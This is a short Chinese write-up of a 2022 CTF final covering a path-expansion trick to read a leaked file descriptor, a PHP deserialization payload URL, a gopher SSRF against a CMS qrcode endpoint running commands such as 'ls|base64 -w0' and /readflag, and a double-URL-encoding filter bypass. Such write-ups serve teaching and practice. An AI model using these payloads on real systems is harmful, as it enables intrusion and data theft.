强国杯决赛Writeup

Posted on 2022-12-26,2 min read

Author:没队伍一人康康题

c0ol P@th

image-20221224104947058
expanduser可以~开头转换对应用户的home。对应/etc/passwd
使用~sys。即可转换为/dev/
image-20221224105108348
刚好flag open了。没close。会有一个fd留着
爆破~sys/fd/6

32加32

16进制 base64 zip解压

pop1

<?php

class kaka
{

    public $pass = true;
    public $name = '1';
    public $age = '1';


    public function cflag()
    {
        if ($this->pass) {
            eval(system('cat /flag'));
        } else {
            echo "no word, flag";
        }
    }

    public function cname($n, $a)
    {
        if ($this->name === $n) {
            if ($this->age === $a) {
                return true;
            }
        }
    }
}
$data=serialize(new kaka());
echo $data;

http://39.107.127.105:50906/?pop=O:4:%22kaka%22:3:{s:4:%22pass%22;b:1;s:4:%22name%22;s:1:%221%22;s:3:%22age%22;s:1:%221%22;}&name=lilei&age=two

ezxunrui

找更新日志

image-20221224121932593

全局搜dr_catcher_data

image-20221224122001362
image-20221224122012986

可以控制参数进入ssrf。nginx一般是fastcgi。打gopher ssrf

image-20221224122052997
先ls|base64 -w0 一次发现有/readflag
然后读flag
image-20221224122132789
http://39.106.156.96:46243/index.php?s=api&c=api&m=qrcode&thumb=gopher payload&text=123&level=1&size=1

Ex1T

原题

https://www.ctfiot.com/59624.html

image-20221224134158547

芝士雪豹

root起的java。。非预期直接两次URL编码绕过flag关键字过滤

image-20221224134248802

下一篇: 强网拟态初赛web→